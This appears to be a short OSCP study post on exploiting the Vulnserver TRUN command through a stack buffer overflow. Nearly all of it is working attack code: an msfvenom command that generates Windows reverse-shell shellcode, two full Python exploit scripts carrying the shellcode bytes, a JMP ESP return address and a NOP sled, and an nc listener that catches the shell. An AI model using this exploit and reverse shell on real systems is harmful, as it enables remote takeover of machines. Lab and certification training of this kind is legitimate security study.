OSCP Security Technology - Modifying Shellcode
阿新 • • 發佈:2021-07-10
OSCP Security Technology - Modifying Shellcode
Generate a shellcode with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf
buffer.py
#!/usr/bin/python import socket import os import sys host="192.168.2.34" port=9999 # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf # 351 bytes buf = b"" buf += b"\xbb\xb0\xb5\x1b\xfb\xdb\xda\xd9\x74\x24\xf4\x5f\x29" buf += b"\xc9\xb1\x52\x83\xef\xfc\x31\x5f\x0e\x03\xef\xbb\xf9" buf += b"\x0e\xf3\x2c\x7f\xf0\x0b\xad\xe0\x78\xee\x9c\x20\x1e" buf += b"\x7b\x8e\x90\x54\x29\x23\x5a\x38\xd9\xb0\x2e\x95\xee" buf += b"\x71\x84\xc3\xc1\x82\xb5\x30\x40\x01\xc4\x64\xa2\x38" buf += b"\x07\x79\xa3\x7d\x7a\x70\xf1\xd6\xf0\x27\xe5\x53\x4c" buf += b"\xf4\x8e\x28\x40\x7c\x73\xf8\x63\xad\x22\x72\x3a\x6d" buf += b"\xc5\x57\x36\x24\xdd\xb4\x73\xfe\x56\x0e\x0f\x01\xbe" buf += b"\x5e\xf0\xae\xff\x6e\x03\xae\x38\x48\xfc\xc5\x30\xaa" buf += b"\x81\xdd\x87\xd0\x5d\x6b\x13\x72\x15\xcb\xff\x82\xfa" buf += b"\x8a\x74\x88\xb7\xd9\xd2\x8d\x46\x0d\x69\xa9\xc3\xb0" buf += b"\xbd\x3b\x97\x96\x19\x67\x43\xb6\x38\xcd\x22\xc7\x5a" buf += b"\xae\x9b\x6d\x11\x43\xcf\x1f\x78\x0c\x3c\x12\x82\xcc" buf += b"\x2a\x25\xf1\xfe\xf5\x9d\x9d\xb2\x7e\x38\x5a\xb4\x54" buf += b"\xfc\xf4\x4b\x57\xfd\xdd\x8f\x03\xad\x75\x39\x2c\x26" buf += b"\x85\xc6\xf9\xe9\xd5\x68\x52\x4a\x85\xc8\x02\x22\xcf" buf += b"\xc6\x7d\x52\xf0\x0c\x16\xf9\x0b\xc7\xd9\x56\x11\x0f" buf += b"\xb2\xa4\x15\x3e\x1e\x20\xf3\x2a\x8e\x64\xac\xc2\x37" buf += b"\x2d\x26\x72\xb7\xfb\x43\xb4\x33\x08\xb4\x7b\xb4\x65" buf += b"\xa6\xec\x34\x30\x94\xbb\x4b\xee\xb0\x20\xd9\x75\x40" buf += b"\x2e\xc2\x21\x17\x67\x34\x38\xfd\x95\x6f\x92\xe3\x67" buf += b"\xe9\xdd\xa7\xb3\xca\xe0\x26\x31\x76\xc7\x38\x8f\x77" buf += b"\x43\x6c\x5f\x2e\x1d\xda\x19\x98\xef\xb4\xf3\x77\xa6" buf += b"\x50\x85\xbb\x79\x26\x8a\x91\x0f\xc6\x3b\x4c\x56\xf9" buf += b"\xf4\x18\x5e\x82\xe8\xb8\xa1\x59\xa9\xd9\x43\x4b\xc4" buf += b"\x71\xda\x1e\x65\x1c\xdd\xf5\xaa\x19\x5e\xff\x52\xde" buf += b"\x7e\x8a\x57\x9a\x38\x67\x2a\xb3\xac\x87\x99\xb4\xe4" # 77A373CD FFE4 JMP ESP buffer = "TRUN /.:/" + "A" * 2003 + "\xcd\x73\xa3\x77" + "\x90" * 16 + buf + "C" * (5060 - 2003 - 4 - 16 - len(buf)) expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) expl.connect((host, port)) expl.send(buffer) expl.close()
Run the script.
Modify the script. ("\xaf\x11\x50\x62")
#!/usr/bin/python import socket import os import sys host="192.168.2.34" port=9999 # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf # 351 bytes buf = b"" buf += b"\xbb\xb0\xb5\x1b\xfb\xdb\xda\xd9\x74\x24\xf4\x5f\x29" buf += b"\xc9\xb1\x52\x83\xef\xfc\x31\x5f\x0e\x03\xef\xbb\xf9" buf += b"\x0e\xf3\x2c\x7f\xf0\x0b\xad\xe0\x78\xee\x9c\x20\x1e" buf += b"\x7b\x8e\x90\x54\x29\x23\x5a\x38\xd9\xb0\x2e\x95\xee" buf += b"\x71\x84\xc3\xc1\x82\xb5\x30\x40\x01\xc4\x64\xa2\x38" buf += b"\x07\x79\xa3\x7d\x7a\x70\xf1\xd6\xf0\x27\xe5\x53\x4c" buf += b"\xf4\x8e\x28\x40\x7c\x73\xf8\x63\xad\x22\x72\x3a\x6d" buf += b"\xc5\x57\x36\x24\xdd\xb4\x73\xfe\x56\x0e\x0f\x01\xbe" buf += b"\x5e\xf0\xae\xff\x6e\x03\xae\x38\x48\xfc\xc5\x30\xaa" buf += b"\x81\xdd\x87\xd0\x5d\x6b\x13\x72\x15\xcb\xff\x82\xfa" buf += b"\x8a\x74\x88\xb7\xd9\xd2\x8d\x46\x0d\x69\xa9\xc3\xb0" buf += b"\xbd\x3b\x97\x96\x19\x67\x43\xb6\x38\xcd\x22\xc7\x5a" buf += b"\xae\x9b\x6d\x11\x43\xcf\x1f\x78\x0c\x3c\x12\x82\xcc" buf += b"\x2a\x25\xf1\xfe\xf5\x9d\x9d\xb2\x7e\x38\x5a\xb4\x54" buf += b"\xfc\xf4\x4b\x57\xfd\xdd\x8f\x03\xad\x75\x39\x2c\x26" buf += b"\x85\xc6\xf9\xe9\xd5\x68\x52\x4a\x85\xc8\x02\x22\xcf" buf += b"\xc6\x7d\x52\xf0\x0c\x16\xf9\x0b\xc7\xd9\x56\x11\x0f" buf += b"\xb2\xa4\x15\x3e\x1e\x20\xf3\x2a\x8e\x64\xac\xc2\x37" buf += b"\x2d\x26\x72\xb7\xfb\x43\xb4\x33\x08\xb4\x7b\xb4\x65" buf += b"\xa6\xec\x34\x30\x94\xbb\x4b\xee\xb0\x20\xd9\x75\x40" buf += b"\x2e\xc2\x21\x17\x67\x34\x38\xfd\x95\x6f\x92\xe3\x67" buf += b"\xe9\xdd\xa7\xb3\xca\xe0\x26\x31\x76\xc7\x38\x8f\x77" buf += b"\x43\x6c\x5f\x2e\x1d\xda\x19\x98\xef\xb4\xf3\x77\xa6" buf += b"\x50\x85\xbb\x79\x26\x8a\x91\x0f\xc6\x3b\x4c\x56\xf9" buf += b"\xf4\x18\x5e\x82\xe8\xb8\xa1\x59\xa9\xd9\x43\x4b\xc4" buf += b"\x71\xda\x1e\x65\x1c\xdd\xf5\xaa\x19\x5e\xff\x52\xde" buf += b"\x7e\x8a\x57\x9a\x38\x67\x2a\xb3\xac\x87\x99\xb4\xe4" # 77A373CD FFE4 JMP ESP buffer = "TRUN /.:/" + "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 16 + buf + "C" * (5060 - 2003 - 4 - 16 - len(buf)) expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) expl.connect((host, port)) expl.send(buffer) expl.close()
nc -nvlp 4444
Refer to:
http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/
相信未來 - 該面對的絕不逃避,該執著的永不怨悔,該捨棄的不再留念,該珍惜的好好把握。